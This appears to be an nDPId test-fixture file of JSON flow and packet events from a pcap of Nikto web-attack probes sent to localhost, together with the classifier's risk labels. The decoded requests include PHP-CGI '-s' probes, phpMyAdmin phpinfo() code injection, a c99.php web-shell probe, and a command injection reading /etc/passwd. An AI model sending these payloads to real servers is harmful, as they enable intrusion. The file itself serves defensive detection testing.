+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id2.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006450)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":1576420277913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420277913,"pkt":"AAAAAAAAAAAAAAAACABFAAC4Ym1AAEAG2dB\/AAABfwAAAceGH5BoAlsuZzuA64AYAED+rAAAAQEICp1m\/8GdZv\/BR0VUIC8\/LXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY1MjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006523)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":1576420277917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277917,"pkt":"AAAAAAAAAAAAAAAACABFAADBkMVAAEAGq29\/AAABfwAAAceIH5D4rqmFil0FBYAYAED+tQAAAQEICp1m\/8WdZv\/ER0VUIC9sb2dpbi5waHA\/LXMgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjUyNCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006524)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":1576420277919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277919,"pkt":"AAAAAAAAAAAAAAAACABFAADk1ppAAEAGZXd\/AAABfwAAAceKH5AeVe\/gFGxiPoAYAED+2AAAAQEICp1m\/8adZv\/GR0VUIC8zcmRwYXJ0eS9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":1576420277920,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277920,"pkt":"AAAAAAAAAAAAAAAACABFAADbRbxAAEAG9l5\/AAABfwAAAceMH5CzBHzzJnp1p4AYAED+zwAAAQEICp1m\/8idZv\/IR0VUIC9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_packet_id":1,"flow_last_seen":1576420277922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277922,"pkt":"AAAAAAAAAAAAAAAACABFAADkm4xAAEAGoIV\/AAABfwAAAceOH5AOOaLD4MTa7oAYAED+2AAAAQEICp1m\/8qdZv\/KR0VUIC8zcmRwYXJ0eS9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_packet_id":1,"flow_last_seen":1576420277923,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277923,"pkt":"AAAAAAAAAAAAAAAACABFAADb3d5AAEAGXjx\/AAABfwAAAceQH5AJweSWVSMF84AYAED+zwAAAQEICp1m\/8udZv\/LR0VUIC9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7560000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_packet_id":1,"flow_last_seen":1576420277925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":1576420277925,"pkt":"AAAAAAAAAAAAAAAACABFAADU+B5AAEAGRAN\/AAABfwAAAceSH5DHT8FWYmCfAYAYAED+yAAAAQEICp1m\/82dZv\/NR0VUIC9wbWEvc2VydmVyX3N5bmMucGhwP2M9cGhwaW5mbygpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY2MDgpDQoNCg=="} +01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7560000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pma\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_packet_id":1,"flow_last_seen":1576420277926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277926,"pkt":"AAAAAAAAAAAAAAAACABFAAC8cdVAAEAGymR\/AAABfwAAAceUH5AbWUib+wxcy4AYAED+sAAAAQEICp1m\/86dZv\/OR0VUIC9jOTkucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY3MzkpDQoNCg=="} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c99.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006739)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_packet_id":1,"flow_last_seen":1576420277928,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1576420277928,"pkt":"AAAAAAAAAAAAAAAACABFAAD73s9AAEAGXSt\/AAABfwAAAceWH5B+NOeIVrpz2oAYAED+7wAAAQEICp1m\/9CdZv\/PR0VUIC9hd2N1c2VyL2NnaS1iaW4vdmNzP3hzbD0vdmNzL3Zjc19ob21lLnhzbCUyNmNhdCUyMCUyMi9ldGMvcGFzc3dkJTIyJTI2IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/awcuser\/cgi-bin\/vcs?xsl=\/vcs\/vcs_home.xsl%26cat%20%22\/etc\/passwd%22%26","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006994)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7560000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_packet_id":1,"flow_last_seen":1576420277929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420277929,"pkt":"AAAAAAAAAAAAAAAACABFAAC7MdtAAEAGCmB\/AAABfwAAAceYH5BhLQiUIFdU+oAYAED+rwAAAQEICp1m\/9GdZv\/RR0VUIC9zY3JpcHQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY5OTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7560000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 